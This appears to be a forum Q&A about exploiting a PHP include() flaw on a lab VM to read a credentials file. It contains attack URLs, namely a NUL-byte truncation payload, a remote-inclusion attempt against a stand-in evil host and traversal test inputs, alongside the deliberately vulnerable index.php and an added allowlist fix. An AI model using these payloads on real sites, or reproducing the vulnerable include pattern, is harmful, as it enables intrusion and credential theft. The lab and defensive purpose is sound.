PHP security exploit - list content of remote PHP file?
Use a directory traversal and end your input string with a %00 NUL meta character (as mentioned on Wikipedia).
http://example.com/index.php?page=setuppreset%00
This will remove the ".php" suffix from the inclusion and might help you somehow.
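The `include()` dispatch from the question's index.php, next to an allowlisted version that neither a traversal sequence nor the %00 truncation described in this answer can steer. This is an added example, not code from the original post; the pages/ directory and the template file names are assumptions.

```php
<?php
// Added example (not from the original post): the question's include()
// dispatch next to a hardened version. The pages/ directory and the
// template file names are assumptions made for this illustration.

// 1. As posted in the question. Whatever arrives in ?page= becomes the
//    path handed to include(); the caller, not the application, decides
//    which file runs.
function vulnerable_target(string $page): string
{
    if ($page === '') {
        return 'home.html';
    }
    return $page . '.php';            // attacker-controlled path
}

// 2. Hardened: the URL parameter is only a key into a fixed map. Unknown
//    keys (setupreset, ../ sequences, NUL bytes, URLs) fall back to the
//    home page instead of reaching the filesystem.
const PAGES = [
    'home'     => 'pages/home.html',
    'products' => 'pages/products.php',
    'forum'    => 'pages/forum.php',
];

function safe_target(string $page): string
{
    $key = ($page === '') ? 'home' : $page;
    return PAGES[$key] ?? PAGES['home'];
}

// Self-check on constructed inputs (run with php -d zend.assertions=1).
assert(vulnerable_target('setupreset') === 'setupreset.php');
assert(safe_target('products') === 'pages/products.php');
assert(safe_target('setupreset') === 'pages/home.html');
assert(safe_target("../includes/header\0") === 'pages/home.html');
assert(safe_target('http://badwebsite.com/myevilscript') === 'pages/home.html');

// In index.php the only change is the include line:
// include(safe_target($_GET['page'] ?? ''));
```

NUL-byte truncation of include paths was removed in PHP 5.3.4, but the allowlist is the real fix on any version, and a credentials file such as setupreset.php belongs outside the document root regardless.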
swiftcode
Updated on April 29, 2020
Comments
-
swiftcode about 4 years
I'm trying to exploit some web vulnerabilities in a sample website running inside a VM (it is not available on the web - only for educational purposes). I have a PHP file named `setupreset.php` which has the information about MySQL configs, setup and passwords used to set up the website. This is in the same directory as the rest of the PHP files (index, products, forum, etc.). This is the code of index.php, for reference:
```php
<?php
include("includes/header.php");

// Grab inputs (index quoted; the original used the bare constant `page`)
$page = $_GET['page'];

if ($page == "") {
    include("home.html");
} else {
    include($page . '.php');   // user-controlled include path
}

include("includes/footer.php");
?>
```
The main goal is to list the contents of the `setupreset` PHP file, or download it somehow. If I navigate to this file: http://10.211.55.5/index.php?page=setupreset, it gets executed, but the PHP code is naturally not shown, due to the fact that it is parsed by the PHP interpreter. Now, the website uses PHP `include`s, so URLs look like this: http://10.211.55.5/index.php?page=products. This seems like it's vulnerable to remote file inclusion, where I could simply point to another PHP page, e.g. http://10.211.55.5/index.php?page=http://badwebsite.com/myevilscript.php but `allow_url_include` is off and cannot be changed, so this won't work (I tried this). However, `allow_url_fopen` is likely on (since it's on by default), so my question is the following: is it possible to upload a PHP file or some script that lists the content of `setupreset.php` using this kind of exploit?
-
swiftcode over 10 years
Yes, that would be easy, but unfortunately I can't change the source code of the file unless it's by some form of exploit.
-
Emilio Gort over 10 years
@evert could you explain... making file_get_content(), I just get the HTML